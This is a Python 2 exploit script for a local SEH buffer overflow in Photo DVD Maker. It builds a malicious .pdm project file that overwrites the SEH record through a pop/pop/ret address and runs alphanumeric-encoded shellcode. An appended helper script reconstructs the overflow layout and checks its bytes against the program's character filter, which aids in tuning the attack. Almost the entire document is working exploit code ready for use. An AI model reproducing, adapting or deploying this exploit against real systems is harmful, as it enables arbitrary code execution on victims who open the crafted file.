#    _  _  _      ___   _     _  _
#   | || | (_)___/ _ \ | |__ | || |
#   |  _  || (_-<| () || | / /|_  _|
#   |_||_| |_/__/ \__/ |_\_\   |_|
#
#[+] Bug         : Photo DVD Maker (.pdm) Local Buffer Overflow Exploit (SEH)
#[+] Refer       : Secunia advisory 35709
#[+] Exploit     : His0k4
#[+] Tested on   : Windows XP (SP3)
#[+] Description : The program filters some characters; I have not tried to list them,
#                  so I went straight to the alpha2 tool (alphanumeric encoder).
#[+] Note        : After generating the project file, convert it to UTF-8 without BOM and save.
#[+] Note2       : You have to open the exploit file from the program (File > Open).
#
# Python 2 script: str literals are raw bytes, so the file is written byte-for-byte.
# header1 is the start of a valid Photo DVD Maker project up to the opening of the
# <File_Name> element; the overflow goes into that element's value; header2 closes it.

header1 = "\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x20"
header1 += "\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x55\x54\x46\x2d\x38\x22\x20\x3f\x3e\x0a"
header1 += "\x3c\x50\x68\x6f\x74\x6f\x5f\x44\x56\x44\x5f\x4d\x61\x6b\x65\x72\x5f\x50\x72\x6f"
header1 += "\x6a\x65\x63\x74\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x37\x2e\x30\x30\x22\x20"
header1 += "\x61\x6c\x62\x75\x6d\x5f\x63\x6f\x75\x6e\x74\x3d\x22\x31\x22\x20\x74\x68\x75\x6d"
header1 += "\x62\x6e\x61\x69\x6c\x5f\x73\x69\x7a\x65\x3d\x22\x38\x30\x22\x20\x61\x6c\x62\x75"
header1 += "\x6d\x5f\x66\x69\x6c\x65\x5f\x74\x69\x6d\x65\x5f\x73\x74\x61\x6d\x70\x3d\x22\x30"
header1 += "\x22\x20\x64\x69\x73\x6b\x5f\x66\x6f\x72\x6d\x61\x74\x3d\x22\x30\x22\x3e\x0a\x20"
header1 += "\x20\x20\x20\x3c\x54\x65\x6d\x70\x5f\x46\x69\x6c\x65\x5f\x50\x61\x74\x68\x3e\x43"
header1 += "\x3a\x5c\x44\x6f\x63\x75\x6d\x65\x6e\x74\x73\x20\x61\x6e\x64\x20\x53\x65\x74\x74"
header1 += "\x69\x6e\x67\x73\x5c\x76\x69\x63\x74\x69\x6d\x5c\x4d\x79\x20\x44\x6f\x63\x75\x6d"
header1 += "\x65\x6e\x74\x73\x5c\x50\x68\x6f\x74\x6f\x20\x44\x56\x44\x20\x4d\x61\x6b\x65\x72"
header1 += "\x5c\x30\x39\x30\x37\x30\x36\x31\x31\x33\x36\x32\x37\x3c\x2f\x54\x65\x6d\x70\x5f"
header1 += "\x46\x69\x6c\x65\x5f\x50\x61\x74\x68\x3e\x0a\x20\x20\x20\x20\x3c\x44\x56\x44\x5f"
header1 += "\x4d\x65\x6e\x75\x20\x62\x6b\x5f\x6d\x75\x73\x69\x63\x5f\x63\x6f\x75\x6e\x74\x3d"
header1 += "\x22\x31\x22\x20\x62\x6b\x5f\x69\x6d\x61\x67\x65\x5f\x63\x6f\x75\x6e\x74\x3d\x22"
header1 += "\x30\x22\x20\x65\x6e\x63\x6f\x64\x65\x5f\x64\x69\x72\x74\x79\x3d\x22\x31\x22\x3e"
header1 += "\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x4d\x65\x6e\x75\x5f\x54\x65\x6d\x70\x6c"
header1 += "\x61\x74\x65\x3e\x36\x34\x58\x6d\x61\x73\x2e\x78\x6d\x6c\x3c\x2f\x4d\x65\x6e\x75"
header1 += "\x5f\x54\x65\x6d\x70\x6c\x61\x74\x65\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c"
header1 += "\x4d\x65\x6e\x75\x5f\x54\x69\x74\x6c\x65\x20\x69\x6e\x69\x74\x61\x6c\x69\x7a\x65"
header1 += "\x64\x3d\x22\x30\x22\x20\x66\x6f\x6e\x74\x3d\x22\x43\x61\x74\x61\x6e\x65\x6f\x20"
header1 += "\x42\x54\x22\x20\x63\x6f\x6c\x6f\x72\x3d\x22\x30\x78\x30\x30\x30\x30\x66\x66\x22"
header1 += "\x20\x73\x69\x7a\x65\x3d\x22\x33\x38\x22\x20\x62\x6f\x6c\x64\x3d\x22\x30\x22\x20"
header1 += "\x69\x74\x61\x6c\x69\x63\x3d\x22\x30\x22\x20\x75\x6e\x64\x65\x72\x6c\x69\x6e\x65"
header1 += "\x3d\x22\x30\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x33\x30\x31\x22\x20\x68\x65\x69"
header1 += "\x67\x68\x74\x3d\x22\x34\x35\x22\x20\x61\x6c\x69\x67\x6e\x3d\x22\x30\x22\x20\x73"
header1 += "\x68\x61\x64\x6f\x77\x3d\x22\x31\x22\x20\x73\x5f\x63\x6f\x6c\x6f\x72\x3d\x22\x30"
header1 += "\x78\x30\x65\x30\x61\x39\x64\x22\x20\x73\x5f\x73\x69\x7a\x65\x3d\x22\x32\x22\x20"
header1 += "\x78\x30\x3d\x22\x36\x30\x22\x20\x79\x30\x3d\x22\x37\x35\x22\x3e\x4d\x79\x20\x50"
header1 += "\x68\x6f\x74\x6f\x20\x41\x6c\x62\x75\x6d\x3c\x2f\x4d\x65\x6e\x75\x5f\x54\x69\x74"
header1 += "\x6c\x65\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x42\x61\x63\x6b\x67\x72\x6f"
header1 += "\x75\x6e\x64\x5f\x4d\x75\x73\x69\x63\x20\x69\x64\x3d\x22\x30\x22\x3e\x43\x3a\x5c"
header1 += "\x50\x72\x6f\x67\x72\x61\x6d\x20\x46\x69\x6c\x65\x73\x5c\x50\x68\x6f\x74\x6f\x20"
header1 += "\x44\x56\x44\x20\x4d\x61\x6b\x65\x72\x20\x50\x72\x6f\x66\x65\x73\x73\x69\x6f\x6e"
header1 += "\x61\x6c\x5c\x6d\x75\x73\x69\x63\x5c\x64\x65\x66\x61\x75\x6c\x74\x2e\x6d\x70\x33"
header1 += "\x3c\x2f\x42\x61\x63\x6b\x67\x72\x6f\x75\x6e\x64\x5f\x4d\x75\x73\x69\x63\x3e\x0a"
header1 += "\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x45\x6e\x63\x6f\x64\x65\x5f\x49\x6e\x66\x6f"
header1 += "\x2f\x3e\x0a\x20\x20\x20\x20\x3c\x2f\x44\x56\x44\x5f\x4d\x65\x6e\x75\x3e\x0a\x20"
header1 += "\x20\x20\x20\x3c\x4f\x70\x74\x69\x6f\x6e\x73\x5f\x44\x61\x74\x61\x20\x64\x65\x6c"
header1 += "\x65\x74\x65\x5f\x74\x65\x6d\x70\x6c\x61\x74\x65\x5f\x66\x69\x6c\x65\x3d\x22\x31"
header1 += "\x22\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x4f\x70\x74\x69\x6f\x6e\x73\x5f"
header1 += "\x44\x69\x73\x6b\x4d\x65\x6e\x75\x5f\x44\x61\x74\x61\x20\x67\x72\x61\x79\x5f\x73"
header1 += "\x63\x61\x6c\x65\x3d\x22\x30\x22\x20\x76\x69\x73\x69\x62\x6c\x65\x5f\x6d\x65\x6e"
header1 += "\x75\x5f\x74\x69\x74\x6c\x65\x3d\x22\x31\x22\x20\x76\x69\x73\x69\x62\x6c\x65\x5f"
header1 += "\x61\x6c\x62\x75\x6d\x5f\x74\x69\x74\x6c\x65\x3d\x22\x31\x22\x20\x76\x69\x73\x69"
header1 += "\x62\x6c\x65\x5f\x61\x6c\x62\x75\x6d\x5f\x69\x6e\x64\x65\x78\x3d\x22\x31\x22\x20"
header1 += "\x76\x69\x73\x69\x62\x6c\x65\x5f\x61\x6c\x62\x75\x6d\x5f\x74\x68\x75\x6d\x62\x6e"
header1 += "\x61\x69\x6c\x3d\x22\x31\x22\x20\x76\x69\x73\x69\x62\x6c\x65\x5f\x70\x61\x67\x65"
header1 += "\x5f\x69\x6e\x64\x65\x78\x3d\x22\x31\x22\x20\x62\x46\x69\x78\x65\x64\x44\x75\x72"
header1 += "\x61\x74\x69\x6f\x6e\x3d\x22\x31\x22\x20\x64\x77\x44\x56\x44\x4d\x65\x6e\x75\x44"
header1 += "\x75\x72\x61\x74\x69\x6f\x6e\x3d\x22\x34\x30\x22\x20\x75\x73\x65\x5f\x64\x76\x64"
header1 += "\x5f\x6d\x65\x6e\x75\x3d\x22\x31\x22\x20\x70\x6c\x61\x79\x5f\x6d\x6f\x64\x65\x3d"
header1 += "\x22\x32\x22\x20\x70\x6c\x61\x79\x5f\x73\x6c\x69\x64\x65\x73\x68\x6f\x77\x5f\x61"
header1 += "\x66\x74\x65\x72\x5f\x70\x6c\x61\x79\x69\x6e\x67\x5f\x6d\x65\x6e\x75\x3d\x22\x31"
header1 += "\x22\x2f\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x4f\x70\x74\x69\x6f\x6e\x73"
header1 += "\x5f\x55\x44\x46\x5f\x44\x61\x74\x61\x20\x6a\x6f\x6c\x69\x65\x74\x3d\x22\x31\x22"
header1 += "\x20\x73\x61\x76\x65\x5f\x6f\x72\x69\x67\x69\x6e\x61\x6c\x5f\x66\x69\x6c\x65\x73"
header1 += "\x3d\x22\x30\x22\x20\x73\x61\x76\x65\x5f\x65\x78\x74\x72\x61\x5f\x66\x69\x6c\x65"
header1 += "\x73\x3d\x22\x30\x22\x20\x63\x6f\x70\x79\x72\x69\x67\x68\x74\x3d\x22\x43\x6f\x70"
header1 += "\x79\x72\x69\x67\x68\x74\x28\x63\x29\x20\x76\x69\x63\x74\x69\x6d\x22\x20\x70\x75"
header1 += "\x62\x6c\x69\x73\x68\x65\x72\x3d\x22\x76\x69\x63\x74\x69\x6d\x22\x20\x76\x6f\x6c"
header1 += "\x75\x6d\x65\x6c\x61\x62\x65\x6c\x3d\x22\x50\x68\x6f\x74\x6f\x20\x41\x6c\x62\x75"
header1 += "\x6d\x20\x6f\x66\x20\x76\x69\x63\x74\x69\x6d\x22\x3e\x0a\x20\x20\x20\x20\x20\x20"
header1 += "\x20\x20\x20\x20\x20\x20\x3c\x4f\x50\x54\x5f\x45\x78\x74\x72\x61\x46\x69\x6c\x65"
header1 += "\x73\x20\x66\x69\x6c\x65\x73\x3d\x22\x30\x22\x20\x66\x6f\x6c\x64\x65\x72\x3d\x22"
header1 += "\x22\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x2f\x4f\x50\x54"
header1 += "\x5f\x45\x78\x74\x72\x61\x46\x69\x6c\x65\x73\x3e\x0a\x20\x20\x20\x20\x20\x20\x20"
header1 += "\x20\x3c\x2f\x4f\x70\x74\x69\x6f\x6e\x73\x5f\x55\x44\x46\x5f\x44\x61\x74\x61\x3e"
header1 += "\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x4f\x70\x74\x69\x6f\x6e\x73\x5f\x54\x56"
header1 += "\x5f\x44\x61\x74\x61\x20\x70\x61\x6c\x3d\x22\x30\x22\x20\x63\x6f\x72\x72\x65\x63"
header1 += "\x74\x69\x6f\x6e\x3d\x22\x31\x22\x20\x63\x72\x6f\x70\x3d\x22\x35\x22\x20\x63\x72"
header1 += "\x6f\x70\x5f\x65\x6e\x61\x62\x6c\x65\x3d\x22\x30\x22\x20\x61\x6e\x74\x69\x66\x6c"
header1 += "\x69\x63\x6b\x3d\x22\x31\x22\x20\x70\x68\x6f\x74\x6f\x5f\x73\x63\x61\x6c\x65\x5f"
header1 += "\x6d\x6f\x64\x65\x3d\x22\x30\x22\x2f\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c"
header1 += "\x4f\x70\x74\x69\x6f\x6e\x73\x5f\x52\x65\x63\x6f\x72\x64\x65\x72\x5f\x44\x61\x74"
header1 += "\x61\x20\x65\x6e\x61\x62\x6c\x65\x5f\x62\x75\x72\x6e\x5f\x70\x72\x6f\x6f\x66\x3d"
header1 += "\x22\x31\x22\x20\x6f\x75\x74\x70\x75\x74\x5f\x62\x75\x72\x6e\x5f\x64\x76\x64\x3d"
header1 += "\x22\x31\x22\x20\x6f\x75\x74\x70\x75\x74\x5f\x64\x69\x73\x63\x5f\x69\x6d\x61\x67"
header1 += "\x65\x3d\x22\x30\x22\x20\x73\x68\x75\x74\x64\x6f\x77\x6e\x3d\x22\x30\x22\x20\x69"
header1 += "\x73\x6f\x5f\x66\x69\x6c\x65\x5f\x6e\x61\x6d\x65\x3d\x22\x22\x20\x63\x6f\x70\x69"
header1 += "\x65\x73\x3d\x22\x31\x22\x20\x64\x72\x69\x76\x65\x72\x5f\x6d\x6f\x64\x65\x3d\x22"
header1 += "\x30\x22\x20\x63\x64\x5f\x77\x72\x69\x74\x69\x6e\x67\x5f\x6d\x6f\x64\x65\x3d\x22"
header1 += "\x30\x22\x20\x73\x69\x6d\x75\x6c\x61\x74\x65\x5f\x77\x72\x69\x74\x69\x6e\x67\x3d"
header1 += "\x22\x31\x22\x20\x73\x70\x65\x65\x64\x3d\x22\x2d\x31\x22\x2f\x3e\x0a\x20\x20\x20"
header1 += "\x20\x3c\x2f\x4f\x70\x74\x69\x6f\x6e\x73\x5f\x44\x61\x74\x61\x3e\x0a\x20\x20\x20"
header1 += "\x20\x3c\x41\x6c\x62\x75\x6d\x5f\x44\x61\x74\x61\x20\x69\x64\x3d\x22\x30\x22\x20"
header1 += "\x74\x79\x70\x65\x3d\x22\x73\x74\x69\x6c\x6c\x69\x6d\x61\x67\x65\x22\x20\x6e\x61"
header1 += "\x6d\x65\x3d\x22\x22\x20\x69\x6d\x61\x67\x65\x5f\x63\x6f\x75\x6e\x74\x3d\x22\x31"
header1 += "\x22\x20\x64\x75\x72\x61\x74\x69\x6f\x6e\x5f\x74\x5f\x6f\x6e\x65\x3d\x22\x32\x22"
header1 += "\x20\x64\x75\x72\x61\x74\x69\x6f\x6e\x5f\x74\x5f\x74\x77\x6f\x3d\x22\x32\x22\x20"
header1 += "\x64\x75\x72\x61\x74\x69\x6f\x6e\x5f\x74\x79\x70\x65\x3d\x22\x30\x22\x20\x62\x6b"
header1 += "\x5f\x63\x6f\x6c\x6f\x72\x3d\x22\x30\x78\x30\x30\x30\x30\x30\x30\x22\x20\x61\x75"
header1 += "\x74\x6f\x5f\x70\x61\x6e\x5f\x7a\x6f\x6f\x6d\x3d\x22\x31\x22\x20\x6d\x75\x73\x69"
header1 += "\x63\x5f\x66\x61\x64\x65\x5f\x69\x6e\x5f\x6f\x75\x74\x3d\x22\x31\x22\x20\x62\x6b"
header1 += "\x5f\x6d\x75\x73\x69\x63\x5f\x63\x6f\x75\x6e\x74\x3d\x22\x31\x22\x20\x73\x70\x72"
header1 += "\x69\x74\x65\x5f\x63\x6f\x75\x6e\x74\x3d\x22\x30\x22\x20\x65\x6e\x63\x6f\x64\x65"
header1 += "\x5f\x64\x69\x72\x74\x79\x3d\x22\x31\x22\x20\x70\x6c\x61\x79\x5f\x6f\x76\x65\x72"
header1 += "\x5f\x63\x75\x72\x72\x65\x6e\x74\x5f\x73\x6f\x6e\x67\x3d\x22\x30\x22\x20\x74\x72"
header1 += "\x61\x6e\x73\x69\x74\x69\x6f\x6e\x5f\x63\x6f\x75\x6e\x74\x3d\x22\x30\x22\x20\x6e"
header1 += "\x6f\x6e\x65\x5f\x74\x72\x61\x6e\x73\x3d\x22\x30\x22\x3e\x0a\x20\x20\x20\x20\x20"
header1 += "\x20\x20\x20\x3c\x41\x6c\x62\x75\x6d\x5f\x54\x68\x65\x6d\x65\x20\x6e\x61\x6d\x65"
header1 += "\x3d\x22\x5f\x6e\x6f\x5f\x74\x68\x65\x6d\x65\x22\x2f\x3e\x0a\x20\x20\x20\x20\x20"
header1 += "\x20\x20\x20\x3c\x54\x68\x65\x6d\x65\x5f\x54\x69\x74\x6c\x65\x20\x45\x6e\x61\x62"
header1 += "\x6c\x65\x64\x3d\x22\x30\x22\x20\x73\x74\x72\x69\x6e\x67\x3d\x22\x22\x20\x63\x6f"
header1 += "\x6c\x6f\x72\x3d\x22\x33\x39\x34\x30\x36\x22\x20\x62\x6b\x5f\x63\x6f\x6c\x6f\x72"
header1 += "\x3d\x22\x30\x22\x20\x73\x69\x7a\x65\x3d\x22\x34\x38\x22\x20\x45\x66\x66\x65\x63"
header1 += "\x74\x3d\x22\x22\x20\x64\x75\x72\x61\x74\x69\x6f\x6e\x3d\x22\x30\x22\x2f\x3e\x0a"
header1 += "\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x54\x68\x65\x6d\x65\x5f\x43\x72\x65\x64\x69"
header1 += "\x74\x20\x45\x6e\x61\x62\x6c\x65\x64\x3d\x22\x30\x22\x20\x73\x74\x72\x69\x6e\x67"
header1 += "\x3d\x22\x22\x20\x63\x6f\x6c\x6f\x72\x3d\x22\x33\x39\x34\x30\x36\x22\x20\x62\x6b"
header1 += "\x5f\x63\x6f\x6c\x6f\x72\x3d\x22\x30\x22\x20\x73\x69\x7a\x65\x3d\x22\x34\x38\x22"
header1 += "\x20\x45\x66\x66\x65\x63\x74\x3d\x22\x22\x20\x64\x75\x72\x61\x74\x69\x6f\x6e\x3d"
header1 += "\x22\x30\x22\x2f\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x45\x6e\x63\x6f\x64"
header1 += "\x65\x5f\x46\x69\x6c\x65\x2f\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x41\x6c"
header1 += "\x62\x75\x6d\x5f\x49\x6d\x61\x67\x65\x20\x69\x64\x3d\x22\x30\x22\x3e\x5a\x3a\x5c"
header1 += "\x41\x6e\x6f\x6e\x79\x6d\x6f\x75\x73\x2e\x4a\x50\x47\x3c\x2f\x41\x6c\x62\x75\x6d"
header1 += "\x5f\x49\x6d\x61\x67\x65\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x42\x61\x63"
header1 += "\x6b\x67\x72\x6f\x75\x6e\x64\x5f\x4d\x75\x73\x69\x63\x20\x69\x64\x3d\x22\x30\x22"
header1 += "\x20\x64\x75\x72\x61\x74\x69\x6f\x6e\x3d\x22\x34\x30\x30\x30\x30\x22\x20\x73\x74"
header1 += "\x61\x72\x74\x3d\x22\x30\x22\x20\x65\x6e\x64\x3d\x22\x34\x30\x30\x30\x30\x22\x20"
header1 += "\x6f\x66\x66\x73\x65\x74\x5f\x69\x6e\x5f\x74\x72\x61\x63\x6b\x3d\x22\x30\x22\x3e"
header1 += "\x43\x3a\x5c\x50\x72\x6f\x67\x72\x61\x6d\x20\x46\x69\x6c\x65\x73\x5c\x50\x68\x6f"
header1 += "\x74\x6f\x20\x44\x56\x44\x20\x4d\x61\x6b\x65\x72\x20\x50\x72\x6f\x66\x65\x73\x73"
header1 += "\x69\x6f\x6e\x61\x6c\x5c\x6d\x75\x73\x69\x63\x5c\x64\x65\x66\x61\x75\x6c\x74\x2e"
header1 += "\x6d\x70\x33\x3c\x2f\x42\x61\x63\x6b\x67\x72\x6f\x75\x6e\x64\x5f\x4d\x75\x73\x69"
header1 += "\x63\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x4d\x65\x6e\x75\x5f\x54\x65\x78"
header1 += "\x74\x20\x69\x6e\x69\x74\x61\x6c\x69\x7a\x65\x64\x3d\x22\x30\x22\x20\x66\x6f\x6e"
header1 += "\x74\x3d\x22\x22\x20\x63\x6f\x6c\x6f\x72\x3d\x22\x30\x78\x30\x30\x30\x30\x30\x30"
header1 += "\x22\x20\x73\x69\x7a\x65\x3d\x22\x30\x22\x20\x62\x6f\x6c\x64\x3d\x22\x30\x22\x20"
header1 += "\x69\x74\x61\x6c\x69\x63\x3d\x22\x30\x22\x20\x75\x6e\x64\x65\x72\x6c\x69\x6e\x65"
header1 += "\x3d\x22\x30\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x30\x22\x20\x68\x65\x69\x67\x68"
header1 += "\x74\x3d\x22\x30\x22\x20\x61\x6c\x69\x67\x6e\x3d\x22\x30\x22\x20\x73\x68\x61\x64"
header1 += "\x6f\x77\x3d\x22\x30\x22\x20\x73\x5f\x63\x6f\x6c\x6f\x72\x3d\x22\x30\x78\x30\x30"
header1 += "\x30\x30\x30\x30\x22\x20\x73\x5f\x73\x69\x7a\x65\x3d\x22\x30\x22\x20\x78\x30\x3d"
header1 += "\x22\x30\x22\x20\x79\x30\x3d\x22\x30\x22\x2f\x3e\x0a\x20\x20\x20\x20\x20\x20\x20"
header1 += "\x20\x3c\x53\x75\x62\x74\x69\x74\x6c\x65\x5f\x46\x6f\x6e\x74\x20\x66\x69\x6c\x65"
header1 += "\x3d\x22\x43\x3a\x5c\x57\x49\x4e\x44\x4f\x57\x53\x5c\x46\x6f\x6e\x74\x73\x5c\x61"
header1 += "\x72\x69\x61\x6c\x2e\x74\x74\x66\x22\x20\x63\x68\x61\x72\x73\x65\x74\x3d\x22\x69"
header1 += "\x73\x6f\x2d\x38\x38\x35\x39\x2d\x31\x22\x20\x73\x69\x7a\x65\x3d\x22\x33\x32\x22"
header1 += "\x2f\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x49\x6d\x61\x67\x65\x5f\x44\x61"
header1 += "\x74\x61\x20\x69\x64\x3d\x22\x30\x22\x20\x61\x6e\x67\x6c\x65\x3d\x22\x30\x22\x20"
header1 += "\x74\x72\x61\x6e\x73\x3d\x22\x42\x6f\x78\x20\x57\x69\x70\x65\x20\x2d\x20\x54\x2e"
header1 += "\x20\x74\x6f\x20\x4c\x2e\x5b\x54\x72\x61\x6e\x73\x69\x74\x69\x6f\x6e\x4c\x69\x62"
header1 += "\x5d\x22\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x46\x69\x6c"
header1 += "\x65\x5f\x4e\x61\x6d\x65\x3e\x43\x3a\x5c"

# Closes the <File_Name> element and the rest of the project document.
header2 = "\x2e\x4a\x50\x47\x3c\x2f\x46\x69\x6c\x65\x5f\x4e\x61\x6d\x65\x3e\x0a\x20\x20\x20"
header2 += "\x20\x20\x20\x20\x20\x3c\x2f\x49\x6d\x61\x67\x65\x5f\x44\x61\x74\x61\x3e\x0a\x20"
header2 += "\x20\x20\x20\x3c\x2f\x41\x6c\x62\x75\x6d\x5f\x44\x61\x74\x61\x3e\x0a\x3c\x2f\x50"
header2 += "\x68\x6f\x74\x6f\x5f\x44\x56\x44\x5f\x4d\x61\x6b\x65\x72\x5f\x50\x72\x6f\x6a\x65"
header2 += "\x63\x74\x3e"

# SEH overwrite. Every stage except the handler address and the 0x21 byte is
# alphanumeric, because the target filters characters (see Description above).
payload = header1
payload += "\x41"*257              # 'A' padding up to the SEH record (align esp)
payload += "\x61"*4                # nSEH: executed as 4x popad (0x61) after pop/pop/ret
payload += "\x56\x29\xD1\x72"      # SEH handler: 0x72D12956, printable p/p/r in msacm32.drv (XP SP3);
                                   # read as code it is push esi / sub ecx,edx / 0x72 = jb rel8
payload += "\x21"                  # rel8 operand of that jb: makes a "not taken" jump over nothing
payload += "\x61"*39               # popad sled: walks esp up the stack toward the shellcode
payload += "\x4C"*4                # dec esp x4
payload += "\x41"*4                # padding (inc ecx if executed)
# win32_exec calc, encoded with alpha2 "zero tolerance" => 741 bytes
payload += (
    "TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIzK7sciJKd"
    "EYxzXIoKOio0OPIRiqY2ig9syRq0ZsfSdQHvVVStp66Rxp4cqFPRbP6pHbhTp"
    "QRTs6PpB2cpVRxwBsr2d721XgDra7BQQqTdpw1pDbtqRStrq724p1QStRaqFP"
    "Xp4qJ7HSrRdszpOpM0NPO3zpNaVV4QRRpw2P0crTppKG8QUw4pN3spK5hbnqW"
    "Suv00J1GrapPpOpNrkfXRoSdPJpQ2kgHPOPUpBpRaQvPPKbnsyWDpKDxSvecp"
    "KW8g12p0PrnraaSw2pLRipIPNszaVpXaRPLW6QGqWp0SqpLPL2lrmrpcq4p74"
    "RlRkbnrf0O2kTsQVduRfRbW6fPsu5g3uPN0KsxroSusv3bW1bpPKrn1XVVBkV"
    "XpNRpbkQDBkQX2opEpNPQ1Qf0PKpNRkcxpNtq0KbxQQtppKbnrirxrnpUW6f2"
    "sv0P1Sblg163g2PLQV4vpKsh1RPTQRBs0Eg8srpLPJRwrnPPPKPHsrw4PNFP2"
    "kpXW2pWPNRqRmQZ0KRhpJrfrjbp0Krn3ytppKRhPBuhCr0KpBPP1R60srrpBk"
    "UhPJQV0N5cPO4uqQp3QXroqR2fQXsuPIQXqZRoSs7H2b0L2k0WQRSuRj6VBbp"
    "ORltxcvp0BoSepJqFqZtybppOpLPXRpPP2gruropOw7Bn1SrvraRfpNBvQS0V"
    "crpPsjTJA"
)
payload += header2

try:
    out_file = open("exploit.pdm", "w")
    out_file.write(payload)
    out_file.close()
    print("\nExploit file created!\n")
except IOError as e:
    print("Error: %s" % e)
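The exploit above relies on two things that are easy to get wrong when the target filters input: the SEH record must land at a fixed offset, and everything the filter sees must come from the allowed character set (the author sidestepped enumerating the bad characters by using alpha2). The following is an added example, not part of His0k4's exploit, that rebuilds the same stage layout from the values in the script (257-byte pad, the msacm32.drv pop/pop/ret address, the stage sizes) and reports each stage's offset and every byte outside the allowed set. The allowed set (mixed-case alphanumerics, which is what alpha2 "zero tolerance" output consists of) and the stand-in shellcode are assumptions; substitute the real encoded shellcode and the real filter results for the target.

```python
"""Layout and character-set check for the .pdm SEH overwrite (added example)."""
import string

# Assumption: the target passes unmodified mixed-case alphanumerics. The page only
# says "some chars" are filtered, so extend or shrink this set to match the target.
ALPHANUM = frozenset((string.ascii_letters + string.digits).encode())

# Values copied from the exploit above.
PAD_TO_NSEH = 257
PPR_MSACM32 = b"\x56\x29\xD1\x72"   # 0x72D12956, pop/pop/ret in msacm32.drv (XP SP3)

# Stages in the order the exploit emits them, before the encoded shellcode.
STAGES = (
    ("pad",        b"A" * PAD_TO_NSEH),  # reach the SEH record
    ("nseh",       b"a" * 4),            # 4x popad, executed after pop/pop/ret
    ("seh",        PPR_MSACM32),         # handler; as code: push esi / sub ecx,edx / jb ...
    ("jb_rel8",    b"!"),                # 0x21, rel8 of the jb the exploit relies on not being taken
    ("popad_sled", b"a" * 39),           # popad sled walking esp up the stack
    ("dec_esp",    b"L" * 4),            # dec esp x4
    ("padding",    b"A" * 4),            # padding
)


def build_overflow(shellcode):
    """Return (buffer, {stage name: offset}) for the File_Name overflow value."""
    buf = bytearray()
    offsets = {}
    for name, chunk in STAGES + (("shellcode", shellcode),):
        offsets[name] = len(buf)
        buf += chunk
    return bytes(buf), offsets


def seh_offsets(buf, handler=PPR_MSACM32):
    """Locate the handler bytes and return (nSEH offset, SEH offset), or (-1, -1)."""
    i = buf.find(handler)
    return (i - 4, i) if i >= 4 else (-1, -1)


def bad_bytes(buf, allowed=ALPHANUM):
    """(offset, byte) for every byte outside the allowed set; these must survive the filter."""
    return [(i, b) for i, b in enumerate(buf) if b not in allowed]


def stage_of(offset, offsets):
    """Name of the stage that contains a given offset, for readable reports."""
    return max((name for name, start in offsets.items() if start <= offset),
               key=lambda n: offsets[n])


if __name__ == "__main__":
    # Constructed stand-in for the 741-byte alpha2 shellcode; any alphanumeric bytes will do here.
    fake_shellcode = b"Z" * 16
    buf, offsets = build_overflow(fake_shellcode)
    print("nSEH/SEH offsets:", seh_offsets(buf))
    for name in ("nseh", "seh", "shellcode"):
        print("%-10s at %d" % (name, offsets[name]))
    for off, b in bad_bytes(buf):
        print("non-alphanumeric byte 0x%02x at offset %d (%s)" % (b, off, stage_of(off, offsets)))
```

Running it shows that only three bytes of the whole overflow value fall outside the alphanumeric set: 0x29 and 0xD1 inside the handler address and the 0x21 that completes the jump. Those are exactly the bytes to confirm against the target's filter before trusting the rest of the layout, and the same check applied to a real alpha2 blob will flag any byte the encoder's character set did not cover.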